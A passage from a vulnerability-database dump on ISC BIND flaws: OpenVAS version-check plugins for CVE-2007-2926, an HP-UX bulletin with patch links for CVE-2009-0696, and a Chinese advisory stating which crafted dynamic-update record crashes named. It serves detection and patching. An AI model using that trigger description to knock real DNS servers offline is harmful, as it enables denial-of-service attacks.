$\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-07:07.bind.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"6.2\", patchlevel:\"7\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"6.1\", patchlevel:\"19\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.5\", patchlevel:\"15\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:58816", "href": "http://plugins.openvas.org/nasl.php?oid=58816", "type": "openvas", "title": "FreeBSD Ports: named", "sourceData": "#\n#VID 3de342fb-40be-11dc-aeac-02e0185f8d72\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: named\n\n=====\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\nif(description)\n{\n script_id(58816);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"FreeBSD Ports: named\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"named\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.4\")>0 && revcomp(a:bver, b:\"9.4.1.1\")<0) {\n txt += 'Package named version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"9.3\")>0 && revcomp(a:bver, b:\"9.3.4.1\")<0) {\n txt += 'Package named version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-26T08:55:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-devel\n bind-utils\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65512", "href": "http://plugins.openvas.org/nasl.php?oid=65512", "type": "openvas", "title": "SLES9: Security update for bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5019202.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for bind\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-devel\n bind-utils\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019202 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65512);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for bind\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~4.4\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "Check for the Version of bind", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861554", "href": "http://plugins.openvas.org/nasl.php?oid=861554", "type": "openvas", "title": "Fedora Update for bind FEDORA-2007-647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2007-647\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"bind on Fedora Core 6\";\ntag_insight = \"BIND (Berkeley Internet Name Domain) is an implementation of the DNS\n (Domain Name System) protocols. BIND includes a DNS server (named),\n which resolves host names to IP addresses; a resolver library\n (routines for applications to use when interfacing with DNS); and\n tools for verifying that the DNS server is operating properly.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-July/msg00487.html\");\n script_id(861554);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2007-647\");\n script_cve_id(\"CVE-2007-2926\");\n script_name( \"Fedora Update for bind FEDORA-2007-647\");\n\n script_summary(\"Check for the Version of bind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-utils\", rpm:\"x86_64/bind-utils~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-libbind-devel\", rpm:\"x86_64/bind-libbind-devel~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-libs\", rpm:\"x86_64/bind-libs~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/caching-nameserver\", rpm:\"x86_64/caching-nameserver~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-devel\", rpm:\"x86_64/bind-devel~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-chroot\", rpm:\"x86_64/bind-chroot~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/bind-debuginfo\", rpm:\"x86_64/debug/bind-debuginfo~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind-sdb\", rpm:\"x86_64/bind-sdb~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/bind\", rpm:\"x86_64/bind~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind\", rpm:\"i386/bind~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-devel\", rpm:\"i386/bind-devel~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-libs\", rpm:\"i386/bind-libs~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-chroot\", rpm:\"i386/bind-chroot~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/bind-debuginfo\", rpm:\"i386/debug/bind-debuginfo~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-libbind-devel\", rpm:\"i386/bind-libbind-devel~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/caching-nameserver\", rpm:\"i386/caching-nameserver~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-utils\", rpm:\"i386/bind-utils~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/bind-sdb\", rpm:\"i386/bind-sdb~9.3.4~7.P1.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-0696"], "description": "Crash on dynamic update message with ANY type (disablind dynamic updates doesn't eliminate problem).", "edition": 1, "modified": "2009-07-30T00:00:00", "published": "2009-07-30T00:00:00", "id": "SECURITYVULNS:VULN:10109", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10109", "title": "ISC bind named DNS server DoS", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2009-0696"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01835108\r\nVersion: 1\r\n\r\nHPSBUX02451 SSRT090137 rev.1 - HP-UX Running BIND, Remote Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-08-06\r\nLast Updated: 2009-08-06\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP-UX running BIND. The vulnerability could be\r\nexploited remotely to create a Denial of Service (DoS).\r\n\r\nReferences: CVE-2009-0696\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-0696 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following preliminary software updates to resolve the vulnerability for BIND v9.2.0 and\r\nBIND v9.3.2.\r\nThe updates can be downloaded from: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nHP-UX Version\r\n BIND Version\r\n File\r\n\r\nB.11.11\r\n 9.2.0\r\n BINDv920-WUPGRADE_1111.depot\r\n\r\nB.11.23\r\n 9.2.0\r\n UNOF_PHNE40089_1_1123.depot\r\n\r\nB.11.11\r\n 9.3.2\r\n BIND932_1111.depot\r\n\r\nB.11.23\r\n 9.3.2\r\n BIND932_1123.depot\r\n\r\nB.11.31\r\n 9.3.2\r\n BIND93WU_1131.depot\r\n\r\nFile\r\n SHA-1 Sum\r\n\r\nBINDv920-WUPGRADE_1111.depot\r\n 2197F121 1BDFAFA5 E8A98F60 91F50F2D 284E4177\r\n\r\nUNOF_PHNE40089_1_1123.depot\r\n 3600737E 62452810 5192FBE5 E7303C21 6337DACC\r\n\r\nBIND932_1111.depot\r\n E500B740 9A2A7C5E F8A8A5B2 087B272F 3D8B5A09\r\n\r\nBIND932_1123.depot\r\n D03F0725 48B15DAD 26A2AD87 3E3DE50F 91937ABA\r\n\r\nBIND93WU_1131.depot\r\n F04EBFA7 36A95873 3E0453F3 EA979EEB 857A59B9\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\n\r\nDownload and install the preliminary software updates.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security\r\nPatch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a\r\nspecific HP-UX system. It can also download patches and create a depot automatically. For more information\r\nsee: https://www.hp.com/go/swa\r\n\r\nAFFECTED VERSIONS\r\n\r\nFor BIND v9.3.2\r\nHP-UX B.11.11\r\n=============\r\nBindUpgrade.BIND-UPGRADE\r\naction: install BIND932_1111.depot\r\nURL: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nHP-UX B.11.23\r\n=============\r\nBindUpgrade.BIND-UPGRADE\r\nBindUpgrade.BIND2-UPGRADE\r\naction: install BIND932_1123.depot\r\nURL: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nHP-UX B.11.31\r\n=============\r\nNameService.BIND-AUX\r\nNameService.BIND-RUN\r\naction:install BIND93WU_1131.depot\r\nURL: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nFor BIND v9.2.0\r\nHP-UX B.11.11\r\n=============\r\nBINDv920.INETSVCS-BIND\r\naction: install BINDv920-WUPGRADE_1111.depot\r\nURL: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nHP-UX B.11.23\r\n=============\r\nInternetSrvcs.INETSVCS-INETD\r\nInternetSrvcs.INETSVCS-RUN\r\nInternetSrvcs.INETSVCS2-RUN\r\naction: install UNOF_PHNE40089_1_1123.depot\r\nURL: ftp://ss090137:ss090137@hprc.external.hp.com/\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 6 August 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP,\r\nespecially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations\r\nand, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the\r\ninformation provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness for a particular purpose, title\r\nand non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein.\r\nThe information provided is provided "as is" without warranty of any kind. To the extent permitted by law,\r\nneither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute\r\nproducts or services; or damages for loss of data, or software restoration. The information in this document\r\nis subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other\r\nproduct and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (HP-UX)\r\n\r\niEYEARECAAYFAkp7Op4ACgkQ4B86/C0qfVlxPACgqj0Nxvg7BivlC2gFr6kS35cs\r\nnREAoIbEUEyQTVngf6kWM8JhfBnV4orx\r\n=GJSl\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-07-18T00:00:00", "published": "2010-07-18T00:00:00", "id": "SECURITYVULNS:DOC:24280", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24280", "title": "[security bulletin] HPSBUX02451 SSRT090137 rev.1 - HP-UX Running BIND, Remote Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:41:43", "description": "Bugraq ID: 35848\r\nCVE ID\uff1aCVE-2009-0696\r\n\r\nISC BIND\u662f\u4e00\u6b3eDNS\u534f\u8bae\u7684\u5b9e\u73b0\u3002\r\nISC BIND 9\u670d\u52a1\u5668\u5904\u7406\u7279\u6b8a\u6784\u5efa\u7684\u52a8\u6001\u66f4\u65b0\u62a5\u6587\u5b58\u5728\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u5f53\u52a8\u6001\u66f4\u65b0\u6d88\u606f\u57fa\u672c\u6bb5\u5305\u542b\u201cANY\u201d\u7c7b\u578b\u8bb0\u5f55\uff0c\u5e76\u4e14\u81f3\u5c11\u4e00\u6761FQDN\u7684RRset\u5b58\u5728\u5728\u670d\u52a1\u5668\u4e0a\uff0c\u4f1a\u89e6\u53d1dns_db_findrdataset()\u5931\u8d25\uff1a\r\ndb.c:659: REQUIRE(type != ((dns_rdatatype_t)dns_rdatatype_any)) failed\r\nexiting (due to assertion failure).\r\n\u8981\u6267\u884c\u6b64\u7c7b\u66f4\u65b0\u62a5\u6587\uff0cnamed\u5fc5\u987b\u8bbe\u7f6e\u5141\u8bb8\u66f4\u65b0\u8bb0\u5f55(\u4e00\u822c\u4e3a\u52a8\u6001DNS)\uff0c\u9700\u8981RNDC\u5bc6\u94a5\u6267\u884c\u6b64\u66f4\u65b0\u3002\n\nISC BIND 9.6 P1\r\nISC BIND 9.6\r\nISC BIND 9.5.1 P1\r\nISC BIND 9.5 P2-W2\r\nISC BIND 9.5 P2-W1\r\nISC BIND 9.5 P2\r\nISC BIND 9.5 a2\r\nISC BIND 9.5 a1\r\nISC BIND 9.4.3 P1\r\nISC BIND 9.4.3\r\nISC BIND 9.4.3\r\nISC BIND 9.4.2 P2-W2\r\nISC BIND 9.4.2 P2-W1\r\nISC BIND 9.4.2 P2\r\nISC BIND 9.4.1 -P1\r\nISC BIND 9.4.1\r\nISC BIND 9.4 rc2\r\nISC BIND 9.4 rc1\r\nISC BIND 9.4 b4\r\nISC BIND 9.4 b3\r\nISC BIND 9.4 b3\r\nISC BIND 9.4 b2\r\nISC BIND 9.4 b1\r\nISC BIND 9.4 a6\r\nISC BIND 9.4 a5\r\nISC BIND 9.4 a4\r\nISC BIND 9.4 a3\r\nISC BIND 9.4 a2\r\nISC BIND 9.4 a1\r\nISC BIND 9.4\r\nISC BIND 9.3.6 P1\r\nISC BIND 9.3.6\r\nISC BIND 9.3.5 P2-W2\r\nISC BIND 9.3.5 P2-W1\r\nISC BIND 9.3.5 P2\r\nISC BIND 9.3.5\r\nISC BIND 9.3.4\r\nISC BIND 9.3.3 rc3\r\nISC BIND 9.3.3 rc2\r\nISC BIND 9.3.3 rc1\r\nISC BIND 9.3.3 rc1\r\nISC BIND 9.3.3 b1\r\nISC BIND 9.3.3 b\r\nISC BIND 9.3.3\r\nISC BIND 9.3.2 -P2\r\nISC BIND 9.3.2 -P1\r\nISC BIND 9.3.2\r\nISC BIND 9.3.1\r\nISC BIND 9.3\r\nISC BIND 9.2.8\r\nISC BIND 9.2.7 rc3\r\nISC BIND 9.2.7 rc2\r\nISC BIND 9.2.7 rc1\r\nISC BIND 9.2.7 b1\r\nISC BIND 9.2.7\r\nISC BIND 9.2.6 -P2\r\nISC BIND 9.2.6 -P1\r\nISC BIND 9.2.6\r\nISC BIND 9.2.5\r\nISC BIND 9.2.4\r\nISC BIND 9.2.3\r\nISC BIND 9.2.2\r\nISC BIND 9.2.1\r\n+ Caldera OpenUnix 8.0\r\n+ MandrakeSoft Linux Mandrake 7.2\r\n+ MandrakeSoft Single Network Firewall 7.2\r\n+ SCO Unixware 7.1.3\r\nISC BIND 9.2\r\n+ Conectiva Linux 8.0\r\n+ Conectiva Linux 8.0\r\n+ HP HP-UX 11.11\r\n+ HP HP-UX 11.11\r\n+ HP HP-UX 11.0\r\n+ HP HP-UX 11.0\r\n+ MandrakeSoft Linux Mandrake 8.2\r\n+ MandrakeSoft Linux Mandrake 8.2\r\n+ MandrakeSoft Linux Mandrake 8.1 ia64\r\n+ MandrakeSoft Linux Mandrake 8.1 ia64\r\n+ MandrakeSoft Linux Mandrake 8.1\r\n+ MandrakeSoft Linux Mandrake 8.1\r\n+ RedHat Linux 7.3 i386\r\n+ RedHat Linux 7.3\r\n+ RedHat Linux 7.3\r\nISC BIND 9.1.3\r\n+ RedHat Linux 7.2 ia64\r\n+ RedHat Linux 7.2 i686\r\n+ RedHat Linux 7.2 i586\r\n+ RedHat Linux 7.2 i386\r\n+ RedHat Linux 7.2\r\n+ S.u.S.E. Linux 8.0 i386\r\n+ 